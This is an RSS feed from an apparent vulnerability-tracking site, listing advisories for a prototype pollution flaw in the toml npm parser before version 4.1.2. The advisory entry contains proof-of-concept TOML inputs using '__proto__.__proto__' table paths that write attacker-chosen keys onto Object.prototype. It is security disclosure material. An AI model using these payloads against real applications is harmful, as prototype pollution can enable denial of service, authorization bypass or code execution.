<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 02:59:27 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-364165</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-364165</link>
      <description>EUVD-2026-364165</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-364165</guid>
    </item>
    <item>
      <title>fkie_cve-2026-63376</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-63376</link>
      <description>&lt;p&gt;toml-node is a TOML parser for Node.js and the browser. Prior to 4.1.2, toml.parse() in lib/compiler.js can be tricked by a table path such as a.b.y.__proto__.__proto__, allowing traversal from a scalar value into Number.prototype and Object.prototype. The currentPath tracking value uses both arrays and strings, so valueAssignments records a comma-joined path such as a,b.y while deepRef checks the dot-joined path a.b.y, allowing the duplicate-key guard to miss and attacker-controlled keys to be written to Object.prototype. A table-array prefix-clearing path in addTableArray can also erase guard state before the same __proto__ traversal. Injected properties become visible throughout the Node.js process and can cause denial of service, logic or authorization bypass, or code execution when an application contains a suitable gadget. This issue is fixed in version 4.1.2.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;toml-node is a TOML parser for Node.js and the browser. Prior to 4.1.2, toml.parse() in lib/compiler.js can be tricked by a table path such as a.b.y.__proto__.__proto__, allowing traversal from a scalar value into Number.prototype and Object.prototype. The currentPath tracking value uses both arrays and strings, so valueAssignments records a comma-joined path such as a,b.y while deepRef checks the dot-joined path a.b.y, allowing the duplicate-key guard to miss and attacker-controlled keys to be written to Object.prototype. A table-array prefix-clearing path in addTableArray can also erase guard state before the same __proto__ traversal. Injected properties become visible throughout the Node.js process and can cause denial of service, logic or authorization bypass, or code execution when an application contains a suitable gadget. This issue is fixed in version 4.1.2.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-63376</guid>
    </item>
    <item>
      <title>GHSA-v5mp-jgw5-2x6j — toml-node: Prototype Pollution Leads to `Object.prototype` Corruption via `__proto__` Key-Path Desynchronization</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-v5mp-jgw5-2x6j</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: toml&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;`toml.parse()` writes attacker-controlled keys onto `Object.prototype`. The compiler protects the tables it builds by creating them with `Object.create(null)`, which neutralizes a direct `[__proto__]` table. An attacker bypasses that protection by routing a table path *through a scalar value* and into the real prototype chain: a path such as `a.b.y.__proto__.__proto__`, where `a.b.y` holds a number, resolves to `Object.prototype` and every subsequent key/value writes onto it.&lt;/p&gt;
&lt;p&gt;The bypass succeeds because the compiler&amp;#39;s duplicate-key guards track paths with keys that do not match the keys used during traversal. The tracking strings and the traversal strings **desynchronize**, so the guard that should reject descending through an existing scalar never fires.&lt;/p&gt;
&lt;p&gt;### Steps to reproduce&lt;/p&gt;
&lt;p&gt;1. Install the latest version and run the comma-desynchronization payload.&lt;/p&gt;
&lt;p&gt;```bash
   npm install toml@4.1.1
   ```&lt;/p&gt;
&lt;p&gt;```js
   const toml = require(&amp;#34;toml&amp;#34;);
   delete Object.prototype.polluted;&lt;/p&gt;
&lt;p&gt;toml.parse(`
   [a.b]
   y = 1
   [a.b.y.__proto__.__proto__]
   polluted = &amp;#34;yes&amp;#34;
   `);&lt;/p&gt;
&lt;p&gt;console.log(({}).polluted);   // -&amp;gt; &amp;#34;yes&amp;#34;
   ```&lt;/p&gt;
&lt;p&gt;2. Observe that a freshly created object inherits the injected key, confirming `Object.prototype` was modified:&lt;/p&gt;
&lt;p&gt;```
   yes
   ```&lt;/p&gt;
&lt;p&gt;3. Confirm the prefix-clear variant reaches the same result:&lt;/p&gt;
&lt;p&gt;```js
   toml.parse(`
   aa = 1
   [[a]]
   [aa.__proto__.__proto__]
   polluted = &amp;#34;yes&amp;#34;
   `);
   console.log(({}).polluted);   // -&amp;gt; &amp;#34;yes&amp;#34;
   ```…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: toml&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;`toml.parse()` writes attacker-controlled keys onto `Object.prototype`. The compiler protects the tables it builds by creating them with `Object.create(null)`, which neutralizes a direct `[__proto__]` table. An attacker bypasses that protection by routing a table path *through a scalar value* and into the real prototype chain: a path such as `a.b.y.__proto__.__proto__`, where `a.b.y` holds a number, resolves to `Object.prototype` and every subsequent key/value writes onto it.&lt;/p&gt;
&lt;p&gt;The bypass succeeds because the compiler&amp;#39;s duplicate-key guards track paths with keys that do not match the keys used during traversal. The tracking strings and the traversal strings **desynchronize**, so the guard that should reject descending through an existing scalar never fires.&lt;/p&gt;
&lt;p&gt;### Steps to reproduce&lt;/p&gt;
&lt;p&gt;1. Install the latest version and run the comma-desynchronization payload.&lt;/p&gt;
&lt;p&gt;```bash
   npm install toml@4.1.1
   ```&lt;/p&gt;
&lt;p&gt;```js
   const toml = require(&amp;#34;toml&amp;#34;);
   delete Object.prototype.polluted;&lt;/p&gt;
&lt;p&gt;toml.parse(`
   [a.b]
   y = 1
   [a.b.y.__proto__.__proto__]
   polluted = &amp;#34;yes&amp;#34;
   `);&lt;/p&gt;
&lt;p&gt;console.log(({}).polluted);   // -&amp;gt; &amp;#34;yes&amp;#34;
   ```&lt;/p&gt;
&lt;p&gt;2. Observe that a freshly created object inherits the injected key, confirming `Object.prototype` was modified:&lt;/p&gt;
&lt;p&gt;```
   yes
   ```&lt;/p&gt;
&lt;p&gt;3. Confirm the prefix-clear variant reaches the same result:&lt;/p&gt;
&lt;p&gt;```js
   toml.parse(`
   aa = 1
   [[a]]
   [aa.__proto__.__proto__]
   polluted = &amp;#34;yes&amp;#34;
   `);
   console.log(({}).polluted);   // -&amp;gt; &amp;#34;yes&amp;#34;
   ```…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-v5mp-jgw5-2x6j</guid>
    </item>
  </channel>
</rss>
